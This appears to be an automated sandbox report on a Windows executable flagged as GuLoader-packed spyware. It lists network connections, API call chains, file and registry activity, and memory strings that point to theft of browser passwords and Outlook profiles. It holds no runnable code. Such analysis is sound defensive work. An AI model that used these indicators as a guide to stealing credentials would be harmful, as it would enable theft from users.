Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50082
Source: unknown	Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50084
Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50043 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown	Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50082 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50065 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown	Network traffic detected: HTTP traffic on port 50061 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50055 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 50078 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown	Network traffic detected: HTTP traffic on port 50049 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown	Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown	Network traffic detected: HTTP traffic on port 50070 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50029 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50084 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49921
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50039
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50063 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50019 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown	Network traffic detected: HTTP traffic on port 50047 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 50041 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50043
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50045
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50047
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50049
Source: unknown	Network traffic detected: HTTP traffic on port 50072 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50051
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989

Source: unknown	HTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.6:49869 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.18.97:443 -> 192.168.2.6:49875 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49964 version: TLS 1.2

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe

Code function: 0_2_0040558F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_0040558F

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_004034A5
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		3_2_004034A5

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 0_2_00404DCC	0_2_00404DCC
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 0_2_00406AF2	0_2_00406AF2
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 0_2_72ED1B5F	0_2_72ED1B5F
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_00404DCC	3_2_00404DCC
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_00406AF2	3_2_00406AF2
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_00154328	3_2_00154328
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_00159048	3_2_00159048
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_00155F90	3_2_00155F90
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_00152DD1	3_2_00152DD1
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_338703AF	3_2_338703AF
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_338753FC	3_2_338753FC
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_3387331A	3_2_3387331A
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_33877628	3_2_33877628
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_3387C638	3_2_3387C638
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_3387F649	3_2_3387F649
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_3387CCA0	3_2_3387CCA0
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_3387EBF7	3_2_3387EBF7
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_33876B01	3_2_33876B01
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_3387E339	3_2_3387E339
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_3387DA89	3_2_3387DA89
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_33876ADF	3_2_33876ADF
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_3387C1F2	3_2_3387C1F2
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_3387B944	3_2_3387B944
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_3387F042	3_2_3387F042
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_33877848	3_2_33877848
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_3387B07F	3_2_3387B07F
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_3387E79F	3_2_3387E79F
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_33876E91	3_2_33876E91
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_33876EA0	3_2_33876EA0
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_3387DEE1	3_2_3387DEE1
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_33877EF8	3_2_33877EF8
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_3387BD88	3_2_3387BD88
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_3387CC91	3_2_3387CC91
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_3387B4EC	3_2_3387B4EC
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AFBDF0	3_2_35AFBDF0
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF9D10	3_2_35AF9D10
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF1400	3_2_35AF1400
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF96C8	3_2_35AF96C8
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF8650	3_2_35AF8650
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AFA9B0	3_2_35AFA9B0
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AFA360	3_2_35AFA360
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF4DA0	3_2_35AF4DA0
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF4DB0	3_2_35AF4DB0
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AFBDE1	3_2_35AFBDE1
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF9D00	3_2_35AF9D00
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF2560	3_2_35AF2560
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF2550	3_2_35AF2550
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF1CA0	3_2_35AF1CA0
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF74B8	3_2_35AF74B8
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF1CB0	3_2_35AF1CB0
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF74C8	3_2_35AF74C8
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF6C18	3_2_35AF6C18
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF0FA8	3_2_35AF0FA8
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF67B0	3_2_35AF67B0
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AFAFE8	3_2_35AFAFE8
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AFAFF8	3_2_35AFAFF8
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AFAFF7	3_2_35AFAFF7
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF67C0	3_2_35AF67C0
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF5F10	3_2_35AF5F10
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF3F60	3_2_35AF3F60
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF3F70	3_2_35AF3F70
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF96B8	3_2_35AF96B8
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF36B0	3_2_35AF36B0
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF36C0	3_2_35AF36C0
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF2E10	3_2_35AF2E10
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF5660	3_2_35AF5660
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF8640	3_2_35AF8640
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF5650	3_2_35AF5650
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF29A8	3_2_35AF29A8
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AFA9A0	3_2_35AFA9A0
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF29B8	3_2_35AF29B8
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AFF120	3_2_35AFF120
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AFF130	3_2_35AFF130
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF2108	3_2_35AF2108
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF4820	3_2_35AF4820
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF4810	3_2_35AF4810
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF7061	3_2_35AF7061
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF7070	3_2_35AF7070
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF0040	3_2_35AF0040
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF1858	3_2_35AF1858
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF43B9	3_2_35AF43B9
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF43C8	3_2_35AF43C8
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF3B08	3_2_35AF3B08
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF3B18	3_2_35AF3B18
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF6368	3_2_35AF6368
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF7B4F	3_2_35AF7B4F
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF6358	3_2_35AF6358
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AFA351	3_2_35AFA351
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF5AA8	3_2_35AF5AA8
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF5AB8	3_2_35AF5AB8
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AFBA97	3_2_35AFBA97
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF5208	3_2_35AF5208
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF5207	3_2_35AF5207
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_35AF3268	3_2_35AF3268
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_3627D608	3_2_3627D608
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_3627E7C8	3_2_3627E7C8
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_3627E7BA	3_2_3627E7BA
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_36278328	3_2_36278328

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe

Code function: String function: 00402C41 appears 51 times

Source: b5BQbAhwVD.exe, 00000000.00000000.2108871344.0000000000455000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs b5BQbAhwVD.exe
Source: b5BQbAhwVD.exe, 00000003.00000000.2376942007.0000000000455000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs b5BQbAhwVD.exe
Source: b5BQbAhwVD.exe, 00000003.00000002.3385761842.00000000336F7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs b5BQbAhwVD.exe
Source: b5BQbAhwVD.exe	Binary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs b5BQbAhwVD.exe

Source: b5BQbAhwVD.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/8@7/6

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_004034A5
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		3_2_004034A5

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe

Code function: 0_2_00404850 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_00404850

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe

Code function: 0_2_00402104 CoCreateInstance,

0_2_00402104

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe

File created: C:\Users\user\AppData\Local\Iw

Jump to behavior

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe

File created: C:\Users\user\AppData\Local\Temp\nss447E.tmp

Jump to behavior

Source: b5BQbAhwVD.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: b5BQbAhwVD.exe, 00000003.00000002.3388123830.00000000348BD000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: b5BQbAhwVD.exe	Virustotal: Detection: 76%
Source: b5BQbAhwVD.exe	ReversingLabs: Detection: 60%

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe

File read: C:\Users\user\Desktop\b5BQbAhwVD.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\b5BQbAhwVD.exe "C:\Users\user\Desktop\b5BQbAhwVD.exe"
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process created: C:\Users\user\Desktop\b5BQbAhwVD.exe "C:\Users\user\Desktop\b5BQbAhwVD.exe"
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process created: C:\Users\user\Desktop\b5BQbAhwVD.exe "C:\Users\user\Desktop\b5BQbAhwVD.exe"	Jump to behavior

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: b5BQbAhwVD.exe

Static file information: File size 1050481 > 1048576

Source: b5BQbAhwVD.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

